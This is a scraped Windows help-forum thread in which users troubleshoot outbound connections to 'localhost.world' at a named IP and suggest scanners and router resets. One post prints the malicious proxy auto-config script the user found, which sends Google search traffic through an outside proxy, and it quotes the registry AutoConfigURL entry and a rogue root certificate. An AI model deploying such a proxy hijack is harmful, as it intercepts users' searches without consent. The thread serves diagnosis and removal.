Windows 10: infection? outbound localhost.world to ip 69.197.188.122

Discus and support infection? outbound localhost.world to ip 69.197.188.122 in AntiVirus, Firewalls and System Security to solve the problem; Got an email from someone that reported a antimalware program was reporting outbound localhost.world to ip 69.197.188.122. The warning came when... Discussion in 'AntiVirus, Firewalls and System Security' started by Cixoos, Oct 23, 2015.

  1. Cixoos Win User

    infection? outbound localhost.world to ip 69.197.188.122


    Got an email from someone that reported a antimalware program was reporting outbound localhost.world to ip 69.197.188.122.

    The warning came when using browsers or some other programs that connected to the net, any idea what this is?

    :)
     
    Cixoos, Oct 23, 2015
    #1
  2. Falenone Win User

    Windows 10 auto enables "Use Proxy Script" after reboots

    Now I actually found out that something keeps changing this setting even when after startup I made sure it was disabled. What the **** is this thing...

    Edit

    After some research. I downloaded the localhost.world file looked what's inside and found this, which is kind of worrying

    function FindProxyForURL(url, host) {

    ba = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ba.test(url)) { return "PROXY 69.197.188.122:8484" }

    bb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (bb.test(url)) { return "PROXY 69.197.188.122:8484" }

    bc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (bc.test(url)) { return "PROXY 69.197.188.122:8484" }

    bd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bd.test(url)) { return "PROXY 69.197.188.122:8484" }

    be = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (be.test(url)) { return "PROXY 69.197.188.122:8484" }

    bf = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bf.test(url)) { return "PROXY 69.197.188.122:8484" }

    return "DIRECT";

    }

    Adwcleaner, Malwarebytes and ESET found nothing. MS Malicious removal thing didn't find anything either.

    After some more research, I'm not the only one facing that exact same problem with cmd window opening up and then chrome force closing.

    Also had this in registry which I removed

    [HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings] "AutoConfigURL"="http://localhost.world/localhost.host"

    Also had odd certificates. Some DO_NOT_TRUST_fiddlerroot, nope, no thanks, got rid of those as well.

    Going through task scheduler, don't see anything odd there disguised that kills chrome.exe or any other browser and updates the setting.

    Turns out I've had something going on here and now I'm left with picking up pieces because no AV found anything
     
    Falenone, Oct 23, 2015
    #2
  3. ActiveSync 4.5 and Kerio Personal Firewall and Asus P535

    I assume you followed the instructions about the inbound/outbound connections:



    1. Allow inbound/outbound connections on the following programs:

    wcescomm.exe (ActiveSync Application)

    WCESMgr.exe (Activesync Connection Manager)

    rapimgr.exe (ActiveSync RAPI Manager)

    CEAPPMGR.exe (This one shows up as Application Manager in Sunbelt)


    2. Open up TCP/IP port 26675 to inbound/outbound traffic.
     
    Linley Meslier, Oct 23, 2015
    #3
  4. simrick Win User

    infection? outbound localhost.world to ip 69.197.188.122

    Hi Cixoos.
    I think localhost.world is possibly a redirect from a botnet (possibly Zeroaccess rootkit). 69.197.188.122 is Wholesale Internet out of Kansas.

    If you think you have an infection or rootkit: Please download TDSSKiller and run it.

    What antivirus do you have on your system?
     
    simrick, Oct 23, 2015
    #4
  5. Cixoos Win User
    It was malwarebytes that reported it i found out.

    I have now tested the machine with eset antivirus, nothing.
    Then tdsskiller and notjing
    Then housecall online and nothing
    roguekiller- Deleted some registry entries, but nothing serious
    zhpcleaner, found some stuff and cleaned.

    Then I blocked the ip in eset firewall with popup notification. It says asus printer utilities are trying constant outbound to 69.197.188.122
     
    Cixoos, Oct 23, 2015
    #5
  6. simrick Win User
    That is the first time I've ever heard of this!

    Want to try one more thing?

    aswMBR
    aswMBR Download
     
    simrick, Oct 23, 2015
    #6
  7. Cixoos Win User
    strange thing indeed, if 69.197.188.122 is blocked with firewall, it is impossible to log in to router on local ip 192.168.1.1.
     
    Cixoos, Oct 24, 2015
    #7
  8. simrick Win User

    infection? outbound localhost.world to ip 69.197.188.122

    Now I'm really confused....that makes no sense to me.
    If you unblock, and access router, can you check for firmware updates on it?
     
    simrick, Oct 24, 2015
    #8
  9. Tsidhu Win User
    I'm having this issue as well. I'm on my laptop with a clean install of Windows 10 and an unfortunate "accident" in which I had to go back to a restore point because I became infected with multiple rootkits and viruses.

    Malwarebytes keeps indicating it is blocking localhost.world at that same ip address listed above. I've run

    *Hijackthis
    *Hitman Pro
    *Emsisoft Emergency Kit

    I removed a few entries with Hijackthis related to BHO search stuff in ie, I've also reset both browsers, and other scanners didn't find anything of note, but I'm still getting the blocking notification.

    Eager to see what else you've found out!

    T.
     
    Tsidhu, Oct 24, 2015
    #9
  10. simrick Win User
    Hi Tsidhu and welcome to Tenforums.

    Please try TDSSKiller and aswMBR in my posts above and report back the results.
     
    simrick, Oct 24, 2015
    #10
  11. Cixoos Win User
    Are you using an asus router?
     
    Cixoos, Oct 24, 2015
    #11
  12. YOU
    You Win User
    I found a post on Malwarebytes mb constant stopping 69.197.188.122, localhost.world - Website Blocking - Malwarebytes Forum The person has a similar problem with the ip being blocked by Malwarebytes while it was attempting to go outbound, originating from different programs (including legitimate ones). He had an ASUS router (I'm not sure if that's what Cixoos is going with this). Then a Malwarebytes employee commented "The block is being removed." This may imply that it is a false positive, but the meaning is unclear. If r router is infected with fake firmware (ASUS specifically had a vulnerability in routers), can usually fix it by resetting the router using a reset pin on the back of it, or unplugging it from the mains for a few minutes. Then, install the latest firmware from the manufacturer.
     
  13. YOU
    You Win User

    infection? outbound localhost.world to ip 69.197.188.122

    But try this first: Go to Network and Sharing Center -> Internet Options -> Connections -> Lan Settings Uncheck "Automatically detect settings" and "Use automatic configuration script" and click OK. Then run Malwarebytes.
     
Thema:

infection? outbound localhost.world to ip 69.197.188.122

Loading...
  1. infection? outbound localhost.world to ip 69.197.188.122 - Similar Threads - infection outbound localhost

  2. BugcheckCode 122

    in Windows 10 Gaming
    BugcheckCode 122: My server 2012 R2 rebooted itself.I found a critical error in events: BugcheckCode 122.Why did it happen ?Full text of the error:System - Provider [ Name] Microsoft-Windows-Kernel-Power [ Guid] {331C3B3A-2005-44C2-AC5E-77220C37D6B4} EventID 41 Version 3 Level 1 Task 63...
  3. BugcheckCode 122

    in Windows 10 Software and Apps
    BugcheckCode 122: My server 2012 R2 rebooted itself.I found a critical error in events: BugcheckCode 122.Why did it happen ?Full text of the error:System - Provider [ Name] Microsoft-Windows-Kernel-Power [ Guid] {331C3B3A-2005-44C2-AC5E-77220C37D6B4} EventID 41 Version 3 Level 1 Task 63...
  4. localhost

    in Windows 10 Gaming
    localhost: In my internet statistics appear several localhost conections that i can not explain. How can i remove them? https://answers.microsoft.com/en-us/windows/forum/all/localhost/adfacb60-c768-448b-b482-217ff884723a
  5. localhost

    in Windows 10 Software and Apps
    localhost: In my internet statistics appear several localhost conections that i can not explain. How can i remove them? https://answers.microsoft.com/en-us/windows/forum/all/localhost/adfacb60-c768-448b-b482-217ff884723a
  6. 127.0.0.1 or localhost don't work, but ip address does?

    in Windows 10 Network and Sharing
    127.0.0.1 or localhost don't work, but ip address does?: Running Windows 10 Pro 64 bit and having an odd issue that I can't resolve. My browser is Edge Chromium. I have a several programs running on my PC that use a web based interface, each running on their own port. For example, 8081 is used by SickBeard. 8082 is used by...
  7. Create outbound IP address rule for 127.0.0.1

    in AntiVirus, Firewalls and System Security
    Create outbound IP address rule for 127.0.0.1: If someone says to create a firewall rule 127.0.01 to 127.0.0.1 how would I do that? 163530
  8. localhost

    in Windows 10 Customization
    localhost: Hello I am using xampp to set up my own web server. My problem is I think, not being able to access port 80, which I think is related to iisrid. Anyway if any one knows what is happening here and has any suggestions would be appreciated[ATTACH]...
  9. The device or resource (localhost) is not set up to accept connections on port "The World...

    in Windows 10 Network and Sharing
    The device or resource (localhost) is not set up to accept connections on port "The World...: Every time i try to access my localhost through any of the browsers it shows that the connection is refused. i tried changing the proxy settings and firewalls setting but all in vain. i tried every possible solutions available on internet to get access to it but of no help....
  10. localhost

    in Windows 10 Network and Sharing
    localhost: I am still not able to configure localhost in windows 10. I am web developer https://answers.microsoft.com/en-us/windows/forum/all/localhost/ab2ec8c7-6da0-4753-b640-691c4254c5ac